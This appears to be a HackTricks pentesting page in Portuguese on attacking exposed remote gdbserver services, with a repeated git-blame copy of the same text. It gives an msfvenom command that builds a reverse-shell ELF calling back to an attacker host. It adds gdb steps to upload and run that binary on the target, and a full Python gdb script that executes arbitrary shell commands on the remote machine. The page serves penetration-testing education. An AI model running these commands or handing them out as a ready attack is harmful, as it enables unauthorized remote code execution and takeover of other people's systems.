hacktricks/network-services-pentesting/pentesting-remote-gdbserver.md

# Pentesting Remote GdbServer

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}

<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>

**Obtenha a perspectiva de um hacker sobre seus aplicativos web, rede e nuvem**

**Encontre e relate vulnerabilidades críticas e exploráveis com impacto real nos negócios.** Use nossas 20+ ferramentas personalizadas para mapear a superfície de ataque, encontrar problemas de segurança que permitem escalar privilégios e usar exploits automatizados para coletar evidências essenciais, transformando seu trabalho árduo em relatórios persuasivos.

{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}

## **Informações Básicas**

**gdbserver** é uma ferramenta que permite a depuração de programas remotamente. Ele é executado ao lado do programa que precisa ser depurado no mesmo sistema, conhecido como "alvo." Essa configuração permite que o **GNU Debugger** se conecte de uma máquina diferente, o "host," onde o código-fonte e uma cópia binária do programa depurado estão armazenados. A conexão entre **gdbserver** e o depurador pode ser feita via TCP ou uma linha serial, permitindo configurações de depuração versáteis.

Você pode fazer um **gdbserver escutar em qualquer porta** e, no momento, **nmap não é capaz de reconhecer o serviço**.

## Exploração

### Upload e Execução

Você pode facilmente criar um **backdoor elf com msfvenom**, enviá-lo e executá-lo:
```bash
# Trick shared by @B1n4rySh4d0w
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 PrependFork=true -f elf -o binary.elf

chmod +x binary.elf

gdb binary.elf

# Set remote debuger target
target extended-remote 10.10.10.11:1337

# Upload elf file
remote put binary.elf binary.elf

# Set remote executable file
set remote exec-file /home/user/binary.elf

# Execute reverse shell executable
run

# You should get your reverse-shell
```
### Execute comandos arbitrários

Há outra maneira de **fazer o depurador executar comandos arbitrários via um** [**script python personalizado retirado daqui**](https://stackoverflow.com/questions/26757055/gdbserver-execute-shell-commands-of-the-target).
```bash
# Given remote terminal running `gdbserver :2345 ./remote_executable`, we connect to that server.
target extended-remote 192.168.1.4:2345

# Load our custom gdb command `rcmd`.
source ./remote-cmd.py

# Change to a trusty binary and run it to load it
set remote exec-file /bin/bash
r

# Run until a point where libc has been loaded on the remote process, e.g. start of main().
tb main
r

# Run the remote command, e.g. `ls`.
rcmd ls
```
Primeiramente, **crie localmente este script**:

{% code title="remote-cmd.py" %}
```python
#!/usr/bin/env python3

import gdb
import re
import traceback
import uuid


class RemoteCmd(gdb.Command):
def __init__(self):
self.addresses = {}

self.tmp_file = f'/tmp/{uuid.uuid4().hex}'
gdb.write(f"Using tmp output file: {self.tmp_file}.\n")

gdb.execute("set detach-on-fork off")
gdb.execute("set follow-fork-mode parent")

gdb.execute("set max-value-size unlimited")
gdb.execute("set pagination off")
gdb.execute("set print elements 0")
gdb.execute("set print repeats 0")

super(RemoteCmd, self).__init__("rcmd", gdb.COMMAND_USER)

def preload(self):
for symbol in [
"close",
"execl",
"fork",
"free",
"lseek",
"malloc",
"open",
"read",
]:
self.load(symbol)

def load(self, symbol):
if symbol not in self.addresses:
address_string = gdb.execute(f"info address {symbol}", to_string=True)
match = re.match(
f'Symbol "{symbol}" is at ([0-9a-fx]+) .*', address_string, re.IGNORECASE
)
if match and len(match.groups()) > 0:
self.addresses[symbol] = match.groups()[0]
else:
raise RuntimeError(f'Could not retrieve address for symbol "{symbol}".')

return self.addresses[symbol]

def output(self):
# From `fcntl-linux.h`
O_RDONLY = 0
gdb.execute(
f'set $fd = (int){self.load("open")}("{self.tmp_file}", {O_RDONLY})'
)

# From `stdio.h`
SEEK_SET = 0
SEEK_END = 2
gdb.execute(f'set $len = (int){self.load("lseek")}($fd, 0, {SEEK_END})')
gdb.execute(f'call (int){self.load("lseek")}($fd, 0, {SEEK_SET})')
if int(gdb.convenience_variable("len")) <= 0:
gdb.write("No output was captured.")
return

gdb.execute(f'set $mem = (void*){self.load("malloc")}($len)')
gdb.execute(f'call (int){self.load("read")}($fd, $mem, $len)')
gdb.execute('printf "%s\\n", (char*) $mem')

gdb.execute(f'call (int){self.load("close")}($fd)')
gdb.execute(f'call (int){self.load("free")}($mem)')

def invoke(self, arg, from_tty):
try:
self.preload()

is_auto_solib_add = gdb.parameter("auto-solib-add")
gdb.execute("set auto-solib-add off")

parent_inferior = gdb.selected_inferior()
gdb.execute(f'set $child_pid = (int){self.load("fork")}()')
child_pid = gdb.convenience_variable("child_pid")
child_inferior = list(
filter(lambda x: x.pid == child_pid, gdb.inferiors())
)[0]
gdb.execute(f"inferior {child_inferior.num}")

try:
gdb.execute(
f'call (int){self.load("execl")}("/bin/sh", "sh", "-c", "exec {arg} >{self.tmp_file} 2>&1", (char*)0)'
)
except gdb.error as e:
if (
"The program being debugged exited while in a function called from GDB"
in str(e)
):
pass
else:
raise e
finally:
gdb.execute(f"inferior {parent_inferior.num}")
gdb.execute(f"remove-inferiors {child_inferior.num}")

self.output()
except Exception as e:
gdb.write("".join(traceback.TracebackException.from_exception(e).format()))
raise e
finally:
gdb.execute(f'set auto-solib-add {"on" if is_auto_solib_add else "off"}')


RemoteCmd()
```
{% endcode %}

<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>

**Obtenha a perspectiva de um hacker sobre seus aplicativos web, rede e nuvem**

**Encontre e relate vulnerabilidades críticas e exploráveis com impacto real nos negócios.** Use nossas mais de 20 ferramentas personalizadas para mapear a superfície de ataque, encontrar problemas de segurança que permitem escalar privilégios e usar exploits automatizados para coletar evidências essenciais, transformando seu trabalho árduo em relatórios persuasivos.

{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}

{% hint style="success" %}
Aprenda e pratique Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Aprenda e pratique Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Confira os [**planos de assinatura**](https://github.com/sponsors/carlospolop)!
* **Junte-se ao** 💬 [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga**-nos no **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe truques de hacking enviando PRs para os repositórios do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>
{% endhint %}
Recreating repository history for branch pt 2024-12-12 12:56:11 +00:00			`# Pentesting Remote GdbServer`

			`{% hint style="success" %}`
			`Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`

			`<details>`

			`<summary>Support HackTricks</summary>`

			`* Check the [subscription plans](https://github.com/sponsors/carlospolop)!`
			`* Join the 💬 [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) or follow us on Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Share hacking tricks by submitting PRs to the [HackTricks](https://github.com/carlospolop/hacktricks) and [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.`

			`</details>`
			`{% endhint %}`

			`<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>`

			`Obtenha a perspectiva de um hacker sobre seus aplicativos web, rede e nuvem`

Translated ['network-services-pentesting/11211-memcache/README.md', 'net 2024-12-14 16:56:05 +00:00			`Encontre e relate vulnerabilidades críticas e exploráveis com impacto real nos negócios. Use nossas 20+ ferramentas personalizadas para mapear a superfície de ataque, encontrar problemas de segurança que permitem escalar privilégios e usar exploits automatizados para coletar evidências essenciais, transformando seu trabalho árduo em relatórios persuasivos.`
Recreating repository history for branch pt 2024-12-12 12:56:11 +00:00
			`{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}`

			`## Informações Básicas`

			gdbserver é uma ferramenta que permite a depuração de programas remotamente. Ele é executado ao lado do programa que precisa ser depurado no mesmo sistema, conhecido como "alvo." Essa configuração permite que o GNU Debugger se conecte de uma máquina diferente, o "host," onde o código-fonte e uma cópia binária do programa depurado estão armazenados. A conexão entre gdbserver e o depurador pode ser feita via TCP ou uma linha serial, permitindo configurações de depuração versáteis.

			`Você pode fazer um gdbserver escutar em qualquer porta e, no momento, nmap não é capaz de reconhecer o serviço.`

			`## Exploração`

			`### Upload e Execução`

			`Você pode facilmente criar um backdoor elf com msfvenom, enviá-lo e executá-lo:`
			```bash
			`# Trick shared by @B1n4rySh4d0w`
			`msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 PrependFork=true -f elf -o binary.elf`

			`chmod +x binary.elf`

			`gdb binary.elf`

			`# Set remote debuger target`
			`target extended-remote 10.10.10.11:1337`

			`# Upload elf file`
			`remote put binary.elf binary.elf`

			`# Set remote executable file`
			`set remote exec-file /home/user/binary.elf`

			`# Execute reverse shell executable`
			`run`

			`# You should get your reverse-shell`
			```
			`### Execute comandos arbitrários`

			`Há outra maneira de fazer o depurador executar comandos arbitrários via um [script python personalizado retirado daqui](https://stackoverflow.com/questions/26757055/gdbserver-execute-shell-commands-of-the-target).`
			```bash
			# Given remote terminal running `gdbserver :2345 ./remote_executable`, we connect to that server.
			`target extended-remote 192.168.1.4:2345`

			# Load our custom gdb command `rcmd`.
			`source ./remote-cmd.py`

			`# Change to a trusty binary and run it to load it`
			`set remote exec-file /bin/bash`
			`r`

			`# Run until a point where libc has been loaded on the remote process, e.g. start of main().`
			`tb main`
			`r`

			# Run the remote command, e.g. `ls`.
			`rcmd ls`
			```
			`Primeiramente, crie localmente este script:`

			`{% code title="remote-cmd.py" %}`
			```python
			`#!/usr/bin/env python3`

			`import gdb`
			`import re`
			`import traceback`
			`import uuid`


			`class RemoteCmd(gdb.Command):`
			`def __init__(self):`
			`self.addresses = {}`

			`self.tmp_file = f'/tmp/{uuid.uuid4().hex}'`
			`gdb.write(f"Using tmp output file: {self.tmp_file}.\n")`

			`gdb.execute("set detach-on-fork off")`
			`gdb.execute("set follow-fork-mode parent")`

			`gdb.execute("set max-value-size unlimited")`
			`gdb.execute("set pagination off")`
			`gdb.execute("set print elements 0")`
			`gdb.execute("set print repeats 0")`

			`super(RemoteCmd, self).__init__("rcmd", gdb.COMMAND_USER)`

			`def preload(self):`
			`for symbol in [`
			`"close",`
			`"execl",`
			`"fork",`
			`"free",`
			`"lseek",`
			`"malloc",`
			`"open",`
			`"read",`
			`]:`
			`self.load(symbol)`

			`def load(self, symbol):`
			`if symbol not in self.addresses:`
			`address_string = gdb.execute(f"info address {symbol}", to_string=True)`
			`match = re.match(`
			`f'Symbol "{symbol}" is at ([0-9a-fx]+) .*', address_string, re.IGNORECASE`
			`)`
			`if match and len(match.groups()) > 0:`
			`self.addresses[symbol] = match.groups()[0]`
			`else:`
			`raise RuntimeError(f'Could not retrieve address for symbol "{symbol}".')`

			`return self.addresses[symbol]`

			`def output(self):`
			# From `fcntl-linux.h`
			`O_RDONLY = 0`
			`gdb.execute(`
			`f'set $fd = (int){self.load("open")}("{self.tmp_file}", {O_RDONLY})'`
			`)`

			# From `stdio.h`
			`SEEK_SET = 0`
			`SEEK_END = 2`
			`gdb.execute(f'set $len = (int){self.load("lseek")}($fd, 0, {SEEK_END})')`
			`gdb.execute(f'call (int){self.load("lseek")}($fd, 0, {SEEK_SET})')`
			`if int(gdb.convenience_variable("len")) <= 0:`
			`gdb.write("No output was captured.")`
			`return`

			`gdb.execute(f'set $mem = (void*){self.load("malloc")}($len)')`
			`gdb.execute(f'call (int){self.load("read")}($fd, $mem, $len)')`
			`gdb.execute('printf "%s\\n", (char*) $mem')`

			`gdb.execute(f'call (int){self.load("close")}($fd)')`
			`gdb.execute(f'call (int){self.load("free")}($mem)')`

			`def invoke(self, arg, from_tty):`
			`try:`
			`self.preload()`

			`is_auto_solib_add = gdb.parameter("auto-solib-add")`
			`gdb.execute("set auto-solib-add off")`

			`parent_inferior = gdb.selected_inferior()`
			`gdb.execute(f'set $child_pid = (int){self.load("fork")}()')`
			`child_pid = gdb.convenience_variable("child_pid")`
			`child_inferior = list(`
			`filter(lambda x: x.pid == child_pid, gdb.inferiors())`
			`)[0]`
			`gdb.execute(f"inferior {child_inferior.num}")`

			`try:`
			`gdb.execute(`
			`f'call (int){self.load("execl")}("/bin/sh", "sh", "-c", "exec {arg} >{self.tmp_file} 2>&1", (char*)0)'`
			`)`
			`except gdb.error as e:`
			`if (`
			`"The program being debugged exited while in a function called from GDB"`
			`in str(e)`
			`):`
			`pass`
			`else:`
			`raise e`
			`finally:`
			`gdb.execute(f"inferior {parent_inferior.num}")`
			`gdb.execute(f"remove-inferiors {child_inferior.num}")`

			`self.output()`
			`except Exception as e:`
			`gdb.write("".join(traceback.TracebackException.from_exception(e).format()))`
			`raise e`
			`finally:`
			`gdb.execute(f'set auto-solib-add {"on" if is_auto_solib_add else "off"}')`


			`RemoteCmd()`
			```
			`{% endcode %}`

			`<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>`

			`Obtenha a perspectiva de um hacker sobre seus aplicativos web, rede e nuvem`

			`Encontre e relate vulnerabilidades críticas e exploráveis com impacto real nos negócios. Use nossas mais de 20 ferramentas personalizadas para mapear a superfície de ataque, encontrar problemas de segurança que permitem escalar privilégios e usar exploits automatizados para coletar evidências essenciais, transformando seu trabalho árduo em relatórios persuasivos.`

			`{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}`

			`{% hint style="success" %}`
			`Aprenda e pratique Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Aprenda e pratique Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`

			`<details>`

			`<summary>Support HackTricks</summary>`

			`* Confira os [planos de assinatura](https://github.com/sponsors/carlospolop)!`
			`* Junte-se ao 💬 [grupo do Discord](https://discord.gg/hRep4RUj7f) ou ao [grupo do telegram](https://t.me/peass) ou siga-nos no Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Compartilhe truques de hacking enviando PRs para os repositórios do [HackTricks](https://github.com/carlospolop/hacktricks) e [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud).`

			`</details>`
			`{% endhint %}`